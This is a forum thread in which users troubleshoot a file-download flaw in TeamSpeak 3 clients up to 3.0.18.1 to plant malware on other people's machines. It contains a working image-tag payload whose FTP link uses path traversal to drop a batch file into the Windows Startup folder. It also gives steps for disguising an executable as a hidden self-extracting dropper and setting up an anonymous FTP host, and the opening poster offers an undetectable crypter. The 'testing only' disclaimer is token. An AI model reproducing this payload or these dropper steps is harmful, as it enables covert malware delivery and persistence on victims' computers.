RFI vulnerability in TeamSpeak [3.0.0 - 3.0.18.1]

sobolek

Member
Joined
Nov 18, 2015
Messages
12
Reaction score
3
Points
38
Can some1 help me with setup this?
Just need .bat script for that to run .exe file downloaded -> Can some1 make it ?

/// Can someone help me with seting it up? I can crypt your file for that. FUD crypter ;) Doing with TeamViewer/ Skype screen share.
 
Last edited:

bl4uni

Active Member
Joined
Sep 10, 2015
Messages
106
Reaction score
69
Points
73
Okay, you have your file (.exe). You now open your file using notepad++. In the first line you will add the code to extract itself and to run the .exe. Then you rename the .exe to .bat. (Make sure it's not .bat.exe). That's it.

If you still don't understand how to do it you should read through the pastebin again. And make sure your ftp server is correctly set up with an anonymous account.
Also remember that this does not work on the newest version and should only be used for testing, not for actually infecting somebody.
 

sobolek

Member
Joined
Nov 18, 2015
Messages
12
Reaction score
3
Points
38
Okay, you have your file (.exe). You now open your file using notepad++. In the first line you will add the code to extract itself and to run the .exe. Then you rename the .exe to .bat. (Make sure it's not .bat.exe). That's it.

If you still don't understand how to do it you should read through the pastebin again. And make sure your ftp server is correctly set up with an anonymous account.
Also remember that this does not work on the newest version and should only be used for testing, not for actually infecting somebody.
Yo man. My FTP is set up correctly, i know that, cause I have anonymous account without password - All files roaming/...bla...bla..bla/ and done everything like you said - Edited my file to extract and etc.. But when i click on my ts3 channel with this
- Its not downloading it.. Tested on 3.0.18.1 - Tried with new link from first post - Same as nothing.. Nothing downloaded - Searched all my PC for the file - nothing. Can you help me with it thru teamviewer/Skype? I will be tommorow ~~16:00PM Polish Time. ( You can check Polish time here: https://www.google.pl/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=time in poland )

Thank's for respond !!
 

Kaptan647

Retired Staff
Contributor
Joined
Apr 25, 2015
Messages
314
Reaction score
395
Points
112
Yo man. My FTP is set up correctly, i know that, cause I have anonymous account without password - All files roaming/...bla...bla..bla/ and done everything like you said - Edited my file to extract and etc.. But when i click on my ts3 channel with this
- Its not downloading it.. Tested on 3.0.18.1 - Tried with new link from first post - Same as nothing.. Nothing downloaded - Searched all my PC for the file - nothing. Can you help me with it thru teamviewer/Skype? I will be tommorow ~~16:00PM Polish Time. ( You can check Polish time here: https://www.google.pl/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=time in poland )

Thank's for respond !!
Rfi is patched at 3.0.18.1. That is why it is not downloading it
 

Supervisor

Administrator
Joined
Apr 27, 2015
Messages
1,863
Reaction score
2,550
Points
335
nope, it is patched in 3.0.18.2
To make it work with 3.0.18.1 ->
Works with 3.0.18.1 if you simply change your link to the following:
[IMG]http://ftp://8.8.8.8/..%5C/..%5C/..%5C/..%5C/..%5C/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/PoC.bat%20.jpg[/IMG]
 

sobolek

Member
Joined
Nov 18, 2015
Messages
12
Reaction score
3
Points
38
Tested all informations from you.. Still cant setup it to get working. All done (i think correctly) but its not downloading my .bat file. Tested on 3.0.18.1. Can some1 help me ?
 

Kaptan647

Retired Staff
Contributor
Joined
Apr 25, 2015
Messages
314
Reaction score
395
Points
112
Tested all informations from you.. Still cant setup it to get working. All done (i think correctly) but its not downloading my .bat file. Tested on 3.0.18.1. Can some1 help me ?
Can you send the logs ?
 

Supervisor

Administrator
Joined
Apr 27, 2015
Messages
1,863
Reaction score
2,550
Points
335
Are you sure you are not running 3.0.18.2?
Make sure you use 3.0.18 first - then move on to 3.0.18.1
 

sobolek

Member
Joined
Nov 18, 2015
Messages
12
Reaction score
3
Points
38
Are you sure you are not running 3.0.18.2?
Make sure you use 3.0.18 first - then move on to 3.0.18.1


Im using then move on to 3.0.18.1 100%.
Even tried on other old Ts3, my friends tested on their pc's and nothing.
 

bl4uni

Active Member
Joined
Sep 10, 2015
Messages
106
Reaction score
69
Points
73
Hey, normally Teamspeak saves its images in %appdata%. However while installing you can select not to save images there, but rather in the teamspeak install directory. What your TS3 Client is trying to do is going up from C:/Program Files (x86)/TeamSpeak 3 Client22222/config/cache/remote/<server-ip>/
It will obviously not land in %appdata% like that.
 

sobolek

Member
Joined
Nov 18, 2015
Messages
12
Reaction score
3
Points
38
Hey, normally Teamspeak saves its images in %appdata%. However while installing you can select not to save images there, but rather in the teamspeak install directory. What your TS3 Client is trying to do is going up from C:/Program Files (x86)/TeamSpeak 3 Client22222/config/cache/remote/<server-ip>/
It will obviously not land in %appdata% like that.
Its not downloading.. It isn't anywhere.
 

bl4uni

Active Member
Joined
Sep 10, 2015
Messages
106
Reaction score
69
Points
73
It can't create the folder. Try reinstalling your teamspeak and make sure your cache is located in %appdata%
 

sobolek

Member
Joined
Nov 18, 2015
Messages
12
Reaction score
3
Points
38
Okay, but some other friends tested it on lower versions - 5-6 friends tested. nothing.
 

sobolek

Member
Joined
Nov 18, 2015
Messages
12
Reaction score
3
Points
38
For everyone with corrupted file after opening .bat
Just add .exe to winrar -> make it .sfx. Go to SFX options -> Make it run after unpack (type filename.exe). Check HIDE ALL and just pack it. Then change from file.sfx.exe to file.exe -> then edit in notepad++ add the first line, make sure its ending with good symbols (like on screen from first post paste).
 

ehthe

Retired Staff
Contributor
Joined
Apr 26, 2015
Messages
1,029
Reaction score
896
Points
216
If the file is empty that means teamspeak did not recognize it as an image file and deleted its content.
 

Supervisor

Administrator
Joined
Apr 27, 2015
Messages
1,863
Reaction score
2,550
Points
335
I tried its downloading but .jpg files
that is because your file really looks like this: test.bat.jpg
Now why is that? -> you have to enable "show known file endings" or whatever its called in english:
It should look similar in your language, so if you did this, rename the file again.

a0412baac3.png


9534dbbcd0.jpg


8ddc24a8f9.png
 

Laszl0w

Well-Known Member
Joined
Oct 10, 2015
Messages
217
Reaction score
149
Points
143
Tested with 3.0.1.6 works perfect but got some questions.

My files is always 0 byte.

Why??
 
Top